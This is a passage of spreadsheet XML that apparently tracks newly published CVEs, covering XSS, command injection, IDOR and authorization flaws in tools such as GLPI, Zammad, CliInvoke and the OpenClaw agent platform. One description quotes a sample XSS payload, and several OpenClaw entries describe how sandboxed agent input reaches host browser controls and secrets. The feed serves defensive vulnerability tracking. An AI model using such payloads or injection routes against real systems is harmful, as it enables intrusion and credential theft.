      <c r="Q48" s="5" t="inlineStr"/>
      <c r="R48" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S48" s="5" t="inlineStr">
        <is>
          <t>The AIL Framework (ail-project/ail-framework) contains a stored cross-site scripting (XSS) vulnerability in two Jinja2 templates that render popovers for matched, tracked, or tagged content: var/www/templates/chats_explorer/block_message.html and var/www/templates/objects/item/show_item.html. In both templates, dynamic values associated with this content, including icon color, icon style, icon glyph, subtype, identifier, name, description, and matched value, are interpolated directly into the data-content HTML attribute of Bootstrap popover elements without appropriate output encoding. Because the popovers are configured with data-html="true", the content is interpreted as HTML in the victim's browser. An authenticated attacker who can influence matched, tracked, or tagged content may inject arbitrary HTML or JavaScript into these values. When a victim displays the affected popover, the injected markup may execute in the victim's session, potentially enabling data exfiltration or actions with the victim's privileges. The vulnerability is classified as stored XSS because the malicious payload can persist in the affected match, tracking, or tag-related data and be delivered to users who view the affected content.</t>
        </is>
      </c>
      <c r="T48" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100172</t>
        </is>
      </c>
    </row>
    <row r="49">
      <c r="A49" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B49" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C49" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100176</t>
        </is>
      </c>
      <c r="D49" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E49" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F49" s="5" t="inlineStr">
        <is>
          <t>5a6e4751-2f3f-4070-9419-94fb35b644e8</t>
        </is>
      </c>
      <c r="G49" s="5" t="inlineStr"/>
      <c r="H49" s="5" t="inlineStr"/>
      <c r="I49" s="5" t="inlineStr"/>
      <c r="J49" s="5" t="inlineStr"/>
      <c r="K49" s="5" t="inlineStr"/>
      <c r="L49" s="5" t="inlineStr"/>
      <c r="M49" s="5" t="inlineStr"/>
      <c r="N49" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O49" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P49" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q49" s="5" t="inlineStr"/>
      <c r="R49" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S49" s="5" t="inlineStr">
        <is>
          <t>The AIL Framework's username timeline feature is vulnerable to stored cross-site scripting (XSS). Usernames imported from chats and crawled forums are stored without character restrictions. When an authenticated analyst views the username timeline, the application renders these stored usernames into the DOM using D3's html() method in the tooltip. Because the username value (d.obj) is interpolated directly into an HTML string without sanitization, a crafted username containing HTML event handlers (e.g., &lt;img src=x onerror=alert(1)&gt;) will execute arbitrary JavaScript in the analyst's browser when the analyst hovers over the corresponding timeline entry. The attack requires the victim to be an authenticated analyst with access to the timeline view and to interact with the malicious timeline entry (hover). Successful exploitation can lead to session hijacking, data exfiltration, or unauthorized actions performed within the analyst's authenticated session. The vulnerability resides in the client-side JavaScript file var/www/static/js/d3/timeline_basic.js.</t>
        </is>
      </c>
      <c r="T49" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100176</t>
        </is>
      </c>
    </row>
    <row r="50">
      <c r="A50" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B50" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C50" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47679</t>
        </is>
      </c>
      <c r="D50" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E50" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F50" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G50" s="5" t="inlineStr"/>
      <c r="H50" s="5" t="inlineStr"/>
      <c r="I50" s="5" t="inlineStr"/>
      <c r="J50" s="5" t="inlineStr"/>
      <c r="K50" s="5" t="inlineStr"/>
      <c r="L50" s="5" t="inlineStr"/>
      <c r="M50" s="5" t="inlineStr"/>
      <c r="N50" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O50" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P50" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q50" s="5" t="inlineStr"/>
      <c r="R50" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S50" s="5" t="inlineStr">
        <is>
          <t>GLPI is a free asset and IT management software package. From 10.0.0 until 10.0.26 and 11.0.8, any logged-in GLPI user can exploit insufficient path validation in the profile-picture update flow to request deletion of an attacker-selected file hosted by the server. This issue is fixed in versions 11.0.8 and 10.0.26.</t>
        </is>
      </c>
      <c r="T50" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47679</t>
        </is>
      </c>
    </row>
    <row r="51">
      <c r="A51" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B51" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C51" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55214</t>
        </is>
      </c>
      <c r="D51" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E51" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F51" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G51" s="5" t="inlineStr"/>
      <c r="H51" s="5" t="inlineStr"/>
      <c r="I51" s="5" t="inlineStr"/>
      <c r="J51" s="5" t="inlineStr"/>
      <c r="K51" s="5" t="inlineStr"/>
      <c r="L51" s="5" t="inlineStr"/>
      <c r="M51" s="5" t="inlineStr"/>
      <c r="N51" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O51" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P51" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q51" s="5" t="inlineStr"/>
      <c r="R51" s="5" t="inlineStr">
        <is>
          <t>CWE-116</t>
        </is>
      </c>
      <c r="S51" s="5" t="inlineStr">
        <is>
          <t>GLPI is a free asset and IT management software package. From 11.0.6 until 11.0.8, an authenticated technician can store active markup in supplier website fields. Any user who opens the affected item's suppliers list triggers the stored cross-site scripting payload. This issue is fixed in version 11.0.8.</t>
        </is>
      </c>
      <c r="T51" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55214</t>
        </is>
      </c>
    </row>
    <row r="52">
      <c r="A52" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B52" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C52" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71483</t>
        </is>
      </c>
      <c r="D52" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E52" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F52" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G52" s="5" t="inlineStr"/>
      <c r="H52" s="5" t="inlineStr"/>
      <c r="I52" s="5" t="inlineStr"/>
      <c r="J52" s="5" t="inlineStr"/>
      <c r="K52" s="5" t="inlineStr"/>
      <c r="L52" s="5" t="inlineStr"/>
      <c r="M52" s="5" t="inlineStr"/>
      <c r="N52" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O52" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P52" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q52" s="5" t="inlineStr"/>
      <c r="R52" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S52" s="5" t="inlineStr">
        <is>
          <t>Horilla is an HR and CRM software. Prior to 1.6.0, the search parameter at /employee/employee-filter-view is reflected by jQuery .html() in employee/templates/employee_nav.html without HTML neutralization. An external attacker can craft and deliver a link that causes JavaScript to execute when an authenticated employee or administrator reaches the employee filter, allowing access to browser-visible session data and actions with the victim's application privileges. This issue is fixed in version 1.6.0.</t>
        </is>
      </c>
      <c r="T52" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71483</t>
        </is>
      </c>
    </row>
    <row r="53">
      <c r="A53" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B53" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C53" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100248</t>
        </is>
      </c>
      <c r="D53" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E53" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F53" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G53" s="5" t="inlineStr"/>
      <c r="H53" s="5" t="inlineStr"/>
      <c r="I53" s="5" t="inlineStr"/>
      <c r="J53" s="5" t="inlineStr"/>
      <c r="K53" s="5" t="inlineStr"/>
      <c r="L53" s="5" t="inlineStr"/>
      <c r="M53" s="5" t="inlineStr"/>
      <c r="N53" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O53" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P53" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q53" s="5" t="inlineStr"/>
      <c r="R53" s="5" t="inlineStr">
        <is>
          <t>CWE-1025</t>
        </is>
      </c>
      <c r="S53" s="5" t="inlineStr">
        <is>
          <t>The Rattadan Cosmowarp smart contract before 56c6147 can have a comparison to an unintended value of current_admin.</t>
        </is>
      </c>
      <c r="T53" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100248</t>
        </is>
      </c>
    </row>
    <row r="54">
      <c r="A54" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B54" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C54" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100368</t>
        </is>
      </c>
      <c r="D54" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E54" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F54" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G54" s="5" t="inlineStr"/>
      <c r="H54" s="5" t="inlineStr"/>
      <c r="I54" s="5" t="inlineStr"/>
      <c r="J54" s="5" t="inlineStr">
        <is>
          <t>nuget</t>
        </is>
      </c>
      <c r="K54" s="5" t="inlineStr"/>
      <c r="L54" s="5" t="inlineStr">
        <is>
          <t>nuget:AlastairLundy.CliInvoke.Specializations, nuget:CliInvoke.Specializations</t>
        </is>
      </c>
      <c r="M54" s="5" t="inlineStr">
        <is>
          <t>2.0.2, 2.10.5, 2.8.5, 2.9.4, 3.0.0-beta.1</t>
        </is>
      </c>
      <c r="N54" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O54" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P54" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q54" s="5" t="inlineStr"/>
      <c r="R54" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S54" s="5" t="inlineStr">
        <is>
          <t>CliInvoke is a .NET library for invoking command-line programs, and its `CliInvoke.Specializations` packages provide specialized wrappers for shells such as PowerShell and Windows Command Prompt. `CliInvoke.Specializations` versions 2.2.0 through 2.8.4, 2.9.0 through 2.9.3, 2.10.0 through 2.10.4, 3.0.0-alpha.1 through 3.0.0-alpha.4, and 3.0.0-alpha.8 through 3.0.0-alpha.10, as well as `AlastairLundy.CliInvoke.Specializations` versions 1.0.0-rc.1 through 1.6.1.1, contain an OS command injection vulnerability in their PowerShell and Cmd wrappers. The wrappers pass a caller-controlled target and arguments to `pwsh -Command` or `cmd /c` using a single `ProcessStartInfo.Arguments` string, allowing a double quote in untrusted input to break operating-system-level quoting and cause the shell to execute an additional command with the host process's privileges. The vulnerability is patched in `CliInvoke.Specializations` versions 2.8.5, 2.9.4, 2.10.5, and 3.0.0-beta.1, and in `AlastairLundy.CliInvoke.Specializations` version 2.0.2. No complete workaround is available; users unable to upgrade should reject or remove double quotes from target paths and arguments, additionally reject shell metacharacters in versions 2.2.0 through 2.9.2 and 3.0.0-alpha.1 through 3.0.0-alpha.4, or bypass the PowerShell and Cmd wrappers and invoke target processes directly when handling untrusted input.</t>
        </is>
      </c>
      <c r="T54" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100368</t>
        </is>
      </c>
    </row>
    <row r="55">
      <c r="A55" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B55" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C55" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100369</t>
        </is>
      </c>
      <c r="D55" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E55" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F55" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G55" s="5" t="inlineStr"/>
      <c r="H55" s="5" t="inlineStr"/>
      <c r="I55" s="5" t="inlineStr"/>
      <c r="J55" s="5" t="inlineStr">
        <is>
          <t>nuget</t>
        </is>
      </c>
      <c r="K55" s="5" t="inlineStr"/>
      <c r="L55" s="5" t="inlineStr">
        <is>
          <t>nuget:AlastairLundy.CliInvoke, nuget:CliInvoke</t>
        </is>
      </c>
      <c r="M55" s="5" t="inlineStr">
        <is>
          <t>2.0.2, 2.10.5, 2.8.5, 2.9.4, 3.0.0-beta.2</t>
        </is>
      </c>
      <c r="N55" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O55" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P55" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q55" s="5" t="inlineStr"/>
      <c r="R55" s="5" t="inlineStr">
        <is>
          <t>CWE-88</t>
        </is>
      </c>
      <c r="S55" s="5" t="inlineStr">
        <is>
          <t>CliInvoke and its formerly named `AlastairLundy.CliInvoke` package are .NET libraries for invoking command-line programs and wrapping executable processes. `CliInvoke` versions 2.0.0 through 2.8.4, 2.9.0 through 2.9.3, 2.10.0 through 2.10.4, and 3.0.0-alpha.1 through 3.0.0-beta.1, as well as `AlastairLundy.CliInvoke` versions 2.0.0-alpha.1 through 2.0.0, contain an argument-injection vulnerability in `RunnerProcessFactory` on the 2.x line and `RunnerConfigurationFactory` on the 3.x line. These factories combine runner arguments, a caller-controlled target, and caller-controlled arguments into one `ProcessStartInfo.Arguments` string, allowing a double quote in the target or an argument to terminate an operating-system-level quoted region and inject unintended elements into the runner’s argument vector, potentially resulting in arbitrary command execution when a shell runner is used. The vulnerability is patched in `CliInvoke` versions 2.8.5, 2.9.4, 2.10.5, and 3.0.0-beta.2, and in `AlastairLundy.CliInvoke` version 2.0.2. No complete workaround is available; users unable to upgrade can partially mitigate the issue by removing double quotes from targets and arguments, additionally removing shell metacharacters when using shell runners, or bypassing the vulnerable factory and constructing a `ProcessConfiguration` with an explicit `ArgumentList`.</t>
        </is>
      </c>
      <c r="T55" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100369</t>
        </is>
      </c>
    </row>
    <row r="56">
      <c r="A56" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B56" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C56" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56731</t>
        </is>
      </c>
      <c r="D56" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E56" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F56" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G56" s="5" t="inlineStr"/>
      <c r="H56" s="5" t="inlineStr"/>
      <c r="I56" s="5" t="inlineStr"/>
      <c r="J56" s="5" t="inlineStr"/>
      <c r="K56" s="5" t="inlineStr"/>
      <c r="L56" s="5" t="inlineStr"/>
      <c r="M56" s="5" t="inlineStr"/>
      <c r="N56" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O56" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P56" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q56" s="5" t="inlineStr"/>
      <c r="R56" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S56" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. Prior to 7.0.1, a low-privilege authenticated user may inject arbitrary HTML markup, including JavaScript event handlers, into a ticket title via the standard ticket creation workflow. The title is persisted without sanitization. This issue is fixed in version 7.0.1.</t>
        </is>
      </c>
      <c r="T56" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56731</t>
        </is>
      </c>
    </row>
    <row r="57">
      <c r="A57" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B57" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C57" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97898</t>
        </is>
      </c>
      <c r="D57" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E57" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F57" s="5" t="inlineStr">
        <is>
          <t>5a6e4751-2f3f-4070-9419-94fb35b644e8</t>
        </is>
      </c>
      <c r="G57" s="5" t="inlineStr"/>
      <c r="H57" s="5" t="inlineStr"/>
      <c r="I57" s="5" t="inlineStr"/>
      <c r="J57" s="5" t="inlineStr"/>
      <c r="K57" s="5" t="inlineStr"/>
      <c r="L57" s="5" t="inlineStr"/>
      <c r="M57" s="5" t="inlineStr"/>
      <c r="N57" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O57" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P57" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q57" s="5" t="inlineStr"/>
      <c r="R57" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-862</t>
        </is>
      </c>
      <c r="S57" s="5" t="inlineStr">
        <is>
          <t>Insecure Direct Object Reference / missing object-level authorization in the Akia keyless entry cloud service. The unlock action is relying on a client-supplied room/door identifier that is not properly authorized server-side against the authenticated guest's booking. An authenticated guest could unlock rooms other than their own, resulting in unauthorized physical access to guest rooms at an affected property.
As of 19th September 2026 the service is no more vulnerable to this attack (feedback received by the reporter). 
The attack is remote but the effect is local to an affected property.</t>
        </is>
      </c>
      <c r="T57" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97898</t>
        </is>
      </c>
    </row>
    <row r="58">
      <c r="A58" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B58" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C58" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100551</t>
        </is>
      </c>
      <c r="D58" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E58" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F58" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G58" s="5" t="inlineStr"/>
      <c r="H58" s="5" t="inlineStr"/>
      <c r="I58" s="5" t="inlineStr"/>
      <c r="J58" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K58" s="5" t="inlineStr"/>
      <c r="L58" s="5" t="inlineStr"/>
      <c r="M58" s="5" t="inlineStr"/>
      <c r="N58" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O58" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P58" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q58" s="5" t="inlineStr"/>
      <c r="R58" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="S58" s="5" t="inlineStr">
        <is>
          <t>OpenClaw for iOS versions &gt;= 2026.7.1 and &lt; 2026.8.11 do not enforce saved Gateway TLS pins in the Control UI. While native connections enforced the saved Gateway fingerprint, the authenticated Terminal and session Dashboard WebViews omitted it. If a user had accepted a Gateway fingerprint, an attacker able to redirect the same host and port and present a different certificate that is accepted by iOS system trust can serve a replacement Control UI page; opening the Terminal or a session Dashboard then allows that page to read the injected Gateway token or password. The stolen credential can grant operator access, including reading sensitive Gateway state and invoking host-capable tools. This issue is fixed in 2026.8.11.</t>
        </is>
      </c>
      <c r="T58" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100551</t>
        </is>
      </c>
    </row>
    <row r="59">
      <c r="A59" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B59" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C59" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100557</t>
        </is>
      </c>
      <c r="D59" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E59" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F59" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G59" s="5" t="inlineStr"/>
      <c r="H59" s="5" t="inlineStr"/>
      <c r="I59" s="5" t="inlineStr"/>
      <c r="J59" s="5" t="inlineStr"/>
      <c r="K59" s="5" t="inlineStr"/>
      <c r="L59" s="5" t="inlineStr"/>
      <c r="M59" s="5" t="inlineStr"/>
      <c r="N59" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O59" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P59" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q59" s="5" t="inlineStr"/>
      <c r="R59" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S59" s="5" t="inlineStr">
        <is>
          <t>OpenClaw versions before 2026.8.1 contain an authorization bypass vulnerability in skill tool dispatch that fails to carry the sender's owner status. Non-owner senders authorized to invoke skill commands can access owner-only tools and server credentials reserved for owners.</t>
        </is>
      </c>
      <c r="T59" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100557</t>
        </is>
      </c>
    </row>
    <row r="60">
      <c r="A60" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B60" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C60" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100568</t>
        </is>
      </c>
      <c r="D60" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E60" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F60" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G60" s="5" t="inlineStr"/>
      <c r="H60" s="5" t="inlineStr"/>
      <c r="I60" s="5" t="inlineStr"/>
      <c r="J60" s="5" t="inlineStr"/>
      <c r="K60" s="5" t="inlineStr"/>
      <c r="L60" s="5" t="inlineStr"/>
      <c r="M60" s="5" t="inlineStr"/>
      <c r="N60" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O60" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P60" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q60" s="5" t="inlineStr"/>
      <c r="R60" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S60" s="5" t="inlineStr">
        <is>
          <t>OpenClaw versions before 2026.8.1 fail to properly restrict access to operator command cron jobs, allowing model-visible agent callers to read and execute ownerless command jobs. Attackers can inspect stored environment variables and force-run disabled or unscheduled command jobs to access secrets and execute operator-authored commands.</t>
        </is>
      </c>
      <c r="T60" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100568</t>
        </is>
      </c>
    </row>
    <row r="61">
      <c r="A61" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B61" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C61" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100588</t>
        </is>
      </c>
      <c r="D61" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E61" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F61" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G61" s="5" t="inlineStr"/>
      <c r="H61" s="5" t="inlineStr"/>
      <c r="I61" s="5" t="inlineStr"/>
      <c r="J61" s="5" t="inlineStr">
        <is>
          <t>npm, rust</t>
        </is>
      </c>
      <c r="K61" s="5" t="inlineStr"/>
      <c r="L61" s="5" t="inlineStr"/>
      <c r="M61" s="5" t="inlineStr"/>
      <c r="N61" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O61" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P61" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q61" s="5" t="inlineStr"/>
      <c r="R61" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S61" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package 'openclaw') before 2026.7.1 does not enforce the administrator scope requirement on browser control when it is reached through the node.invoke method, although direct browser.request access requires administrator scope. In Gateway deployments that honor caller identity and narrower operator scopes, a write-scoped caller with access to a connected browser-capable node can inspect pages, navigate tabs, or interact with browser-visible applications without the configured admin requirement; practical impact depends on the browser profile and signed-in state. Shared-secret token and password callers are considered fully trusted operators under OpenClaw's security model and are not affected. The issue is fixed in 2026.7.1.</t>
        </is>
      </c>
      <c r="T61" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100588</t>
        </is>
      </c>
    </row>
    <row r="62">
      <c r="A62" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B62" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C62" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100589</t>
        </is>
      </c>
      <c r="D62" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E62" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F62" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G62" s="5" t="inlineStr"/>
      <c r="H62" s="5" t="inlineStr"/>
      <c r="I62" s="5" t="inlineStr"/>
      <c r="J62" s="5" t="inlineStr"/>
      <c r="K62" s="5" t="inlineStr"/>
      <c r="L62" s="5" t="inlineStr"/>
      <c r="M62" s="5" t="inlineStr"/>
      <c r="N62" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O62" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P62" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q62" s="5" t="inlineStr"/>
      <c r="R62" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S62" s="5" t="inlineStr">
        <is>
          <t>OpenClaw versions before 2026.7.1 contain a sandbox bypass vulnerability in the browser tool that allows sandboxed sessions to access paired node browser actions despite allowHostControl=false configuration. Attackers with control over sandboxed agent input can select a paired node and perform host browser operations, inspecting or manipulating the connected browser profile and its authenticated state.</t>
        </is>
      </c>
      <c r="T62" s="6" t="inlineStr">
        <is>
